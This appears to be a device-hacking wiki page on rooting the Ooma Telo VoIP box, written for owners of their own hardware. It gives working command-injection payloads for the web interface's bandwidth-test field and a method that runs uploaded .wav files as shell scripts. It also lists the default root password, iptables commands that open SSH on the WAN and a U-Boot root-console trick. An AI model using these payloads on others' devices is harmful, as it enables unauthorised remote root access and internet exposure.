Ooma Telo

2015-05-09T21:19:50Z

Trips: Added new serial exploit

__FORCETOC__
{{Disclaimer}}
[[File:Ooma_Telo.jpg|200px|left|thumb]]
[[Category:VOIP]]
This page will be dedicated to a general overview, descriptions, and information related to the Ooma Telo.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/B002O3W4LE/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B002O3W4LE&linkCode=as2&tag=gtvcom-20&linkId=EBJAMKMCFKJMDU4E Purchase the Ooma Telo at Amazon]

== GPL ==
You can find GPL code for the [http://ooma.com/legal/ooma-gnu-linux-source-code Ooma Telo Here]

== Disassembly ==
<gallery>
File: Ooma_Telo_000.jpg
File: Ooma_Telo_001.jpg
File: Ooma_Telo_002.jpg
File: Ooma_Telo_003.jpg
File: Ooma_Telo_004.jpg
File: Ooma_Telo_006.jpg
File: Ooma_Telo_007.jpg
File: Ooma_Telo_008.jpg
File:
</gallery>

== UART ==
<gallery>
File:Ooma_Telo_UART.jpg
</gallery>

== Exploiting the Ooma Web Interface (iPerf) ==
* In order to access the Ooma Telo panel web interface you must either be plugged into the "LAN" port on the back of the device OR have the "remote administration" checkbox checked in the Ooma web interface panel.

'''Option 1'''
# Visit the Ooma web interface (The default IP for the LAN side is [http://172.27.35.1/])
# In the left menu panel click "Tools"
# In the left panel click "Bandwidth"
# In the server field you can enter in any in the following syntax <pre>a.com$(COMMANDHERE)</pre>
# Click "Run Test"

'''Option 2'''
# [http://download.gtvhacker.com/file/ooma/telo/OomaPwn.zip Download OomaPwn.zip]
# Visit the Ooma web interface (The default IP for the LAN side is [http://172.27.35.1/])
# Go to Ringtones and upload both .wav files from downloaded OomaPwn.zip
# Navigate to Tools -> Bandwidth
# Enter the following one at a time into the Server IP Address
#: Note: It will report an error, this is normal.<pre>$(chmod 755 /media/ringtone/*pwn.wav)</pre><pre>$(/bin/sh /media/ringtone/*pwn.wav)</pre>
# When the script is done the Ooma unit will reboot
# You now have SSH access to the unit. root password is !ooma123

== Demo ==
{{#ev:youtube|dXet8HHHBdg}}

== Dropbear SSHD ==
The default credentials for the Ooma Telo are:

'''Username:''' root

'''Password:''' !ooma123

Dropbear runs on kernel boot by default but is blocked by iptable rules.

== IPTable Rules ==
Remote command execution through iperf screen hostname:
<pre>x.com$(reboot)</pre>

Enable LAN SSH
<pre>x.com$(iptables -t filter -A LAN_SSH -j ACCEPT)</pre>

Enable SSH on WAN
<pre>x.com$(iptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT)</pre>

Permanently edit iptables rule (till next update)
<pre>mount -o,remount -rw -t ubifs ubi0:rootfsa /
echo -e "\n#Add sshd server\niptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT" >> /etc/ip_table.rules
mount -o,remount -r -t ubifs ubi0:rootfsa /</pre>

== Enable Console from U-Boot ==
In newer Ooma firmwares, serial is disabled by default. A root prompt can be triggered by creating a UBI partition with the name of serial.

From the U-Boot console, enter the following:
<pre>run ubipart; ubi create serial 128; reset;</pre>

This also works on the newer Ooma Telo hardware. Shoutout to Trips for finding this.

Exploitee.rs - User contributions [en]

Ooma Telo